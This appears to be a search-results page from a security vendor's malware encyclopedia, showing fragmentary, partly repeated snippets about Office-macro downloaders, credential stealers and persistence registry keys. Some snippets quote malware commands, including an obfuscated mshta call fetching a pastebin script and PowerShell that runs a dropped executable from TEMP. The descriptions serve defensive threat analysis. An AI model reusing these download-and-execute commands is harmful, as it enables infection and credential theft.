Search
Keyword: ms
The MS Excel file contains the following fake details luring users to enable macro content: W97M.Downloader.GET (BitDefender); Trojan-Downloader.VBA.Agent (Ikarus); Trojan.Mdropper (Norton) Dropped by
downloaded unknowingly by users when visiting malicious sites. Installation This Exploit adds the following processes: cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/KaRJhyiv %System%\WindowsPowerShell\v1.0
vulnerabilities. MS Bulletin ID Vulnerability ID DPI Rule Number DPI Rule Name Release Date IDF Compatibility CVE-2013-3906 1005764 Microsoft Graphics Component Remote Code Execution Vulnerability (CVE-2013-3906)
JDownloder v2.0 Steam Attempts to get stored credential from the following: Eudora MS Outlook Google Desktop Windows Mail Windows Live Mail Incredimail Gmail Hotmail/MSN Yahoo! Mail Netscape Mail Attempts to
from the following: Eudora MS Outlook Google Desktop Windows Mail Windows Live Mail Incredimail Gmail Hotmail/MSN Yahoo! Mail Netscape Mail Attempts to get stored info such as username, password and
Firewall (IDF) plugin are also protected from attacks using these vulnerabilities. MS Bulletin ID Vulnerability ID DPI Rule Number DPI Rule Name Release Date Vulnerability Protection and IDF Compatibility
file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Installation This Trojan adds the following processes: CMD.EXE /c ms^hta http://{BLOCKED}.2^
\RC.resources.dll %Program Files%\ErrorFix KIT\es-ES\RC.resources.dll %Program Files%\ErrorFix KIT\vi\RC.resources.dll %Program Files%\ErrorFix KIT\vi\RC.resources.dll %Program Files%\ErrorFix KIT\ms\RC.resources.dll
to enable its automatic execution at every system startup: HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Run MS Common User Interface = "%ProgramData%\Microsofts\Windows NT\svchost.exe
\CurrentControlSet\ Services\MediaCenter DisplayName = "MS Media Control Center" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\MediaCenter\Parameters ServiceDll = "%System%\Prcmxnq.src" HKEY_LOCAL_MACHINE
\CurrentControlSet\ Services\MediaCenter DisplayName = "MS Media Control Center" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\MediaCenter\Parameters ServiceDll = "%System%\Prcmxnq.src" HKEY_LOCAL_MACHINE
\CurrentControlSet\ Services\MediaCenter DisplayName = "MS Media Control Center" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\MediaCenter\Parameters ServiceDll = "%System%\Prcmxnq.src" HKEY_LOCAL_MACHINE
secured or not [Yes/ No]) It attempts to steal stored email credentials from the following: Outlook Express IncrediMail Eudora GroupMail Free MS Outlook 2002/ 2003/ 2007/ 2010 Gmail Hotmail/MSN Yahoo! Mail
Search and Download MS Office documents (doc, docx, xls, xlsx) It connects to the following URL(s) to send and receive commands from a remote malicious user: http://{BLOCKED}.{BLOCKED}.241.141/v1 http://
or C:\Users\{user name}\AppData\Local\Temp on Windows Vista and 7.) NOTES: When a machine is affected with this malware, MS Excel exits and runs again opening the non-malicious .XLS file to trick users
(64-bit).) Other System Modifications This Trojan Spy deletes the following files: %Windows%\Tasks\Ms visual extension.job (Note: %Windows% is the Windows folder, where it usually is C:\Windows on all
\CurrentControlSet\ Services\MediaCenter DisplayName = "MS Media Control Center" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\MediaCenter\Parameters ServiceDll = "%System%\Prcmxnq.src" HKEY_LOCAL_MACHINE
\svchost.exe -k krnlsrvc" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\MediaCenter DisplayName = "MS Media Control Center" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\MediaCenter\Parameters
'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe); NOTES: The MS Excel file contains the following fake details luring users to enable macro content: TrojanDownloader:O97M/Donoff (Microsoft);
Shell.Application).ShellExecute($env:TEMP + '\dr.exe'); Stop-Process -Id $Pid -Force; --> NOTES: The MS Excel file contains the following fake details luring users to enable macro content: